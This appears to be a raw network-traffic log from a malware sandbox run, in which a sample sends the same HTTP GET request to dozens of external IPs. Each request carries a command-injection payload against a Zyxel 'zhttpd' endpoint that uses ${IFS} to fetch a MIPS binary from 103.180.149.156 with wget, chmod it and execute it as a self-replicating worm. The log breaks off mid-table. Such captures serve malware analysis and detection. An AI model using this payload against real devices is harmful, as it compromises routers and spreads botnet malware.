                                            Feb 2, 2024 06:21:28.962949038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8649192.168.2.1560334208.7.120.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.962975025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8650192.168.2.15590028.88.254.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963011026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8651192.168.2.154956286.118.62.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963062048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8652192.168.2.154134899.250.89.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963092089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8653192.168.2.153764057.27.246.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963140965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8654192.168.2.154898884.209.112.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963212013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8655192.168.2.1552672113.243.225.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963212967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8656192.168.2.1551780103.150.114.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963294029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8657192.168.2.1548918139.246.27.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963329077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8658192.168.2.1532894201.165.103.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963397026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8659192.168.2.154734220.64.61.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963413000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8660192.168.2.1552468149.33.245.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963462114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8661192.168.2.1535556152.48.255.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963516951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8662192.168.2.1544036112.229.238.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963560104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8663192.168.2.1549318189.90.168.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963618994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8664192.168.2.1539324120.206.216.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963649035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8665192.168.2.1559240151.44.218.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963684082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8666192.168.2.155283218.44.131.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963731050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8667192.168.2.1536360147.234.195.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963798046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8668192.168.2.1542164206.255.102.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963840008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8669192.168.2.155392040.242.237.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963871002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8670192.168.2.1555194176.178.205.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963902950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8671192.168.2.154019274.51.134.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963953972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8672192.168.2.153737827.34.29.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.963975906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8673192.168.2.155535085.192.156.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964004040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8674192.168.2.1559982222.39.52.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964065075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8675192.168.2.153946831.33.222.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964142084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8676192.168.2.1535766147.249.72.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964157104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8677192.168.2.1543928161.19.190.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964184046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8678192.168.2.1548230190.71.177.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964220047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8679192.168.2.154934693.178.155.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964276075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8680192.168.2.155804424.37.66.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964319944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8681192.168.2.154303244.155.143.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964355946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8682192.168.2.15468708.145.144.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964380980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8683192.168.2.155091491.139.50.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964417934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8684192.168.2.1552274100.176.34.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964481115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8685192.168.2.153857043.193.213.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964538097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8686192.168.2.1555450166.200.166.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964555025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8687192.168.2.1534092220.51.143.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964566946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8688192.168.2.1541146153.155.136.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964634895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8689192.168.2.1557392222.174.14.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964678049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8690192.168.2.155157032.85.143.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964701891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8691192.168.2.155699444.119.40.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964723110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8692192.168.2.154714839.87.143.73443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964761972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8693192.168.2.1551176197.47.15.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964818001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8694192.168.2.1555408107.122.218.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964839935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8695192.168.2.154626239.136.215.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964855909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8696192.168.2.154967220.165.22.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964900970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8697192.168.2.1556062109.195.37.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964963913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8698192.168.2.155413412.17.203.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.964991093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8699192.168.2.155119072.34.67.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965023041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8700192.168.2.1558208216.11.153.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965045929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8701192.168.2.1542872134.129.34.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965096951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8702192.168.2.1534012169.206.244.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965122938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8703192.168.2.1556698110.213.97.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965176105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8704192.168.2.1540278187.119.195.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965219021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8705192.168.2.155440835.164.231.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965253115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8706192.168.2.153419254.124.210.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965274096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8707192.168.2.1551126162.231.214.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965353966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8708192.168.2.1542192158.80.12.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965378046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8709192.168.2.1539778172.52.160.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965430021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8710192.168.2.155367043.100.144.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965480089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8711192.168.2.1537864112.170.182.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:28.965517998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8712192.168.2.1557654167.84.123.84443
                                            TimestampBytes transferredDirectionData
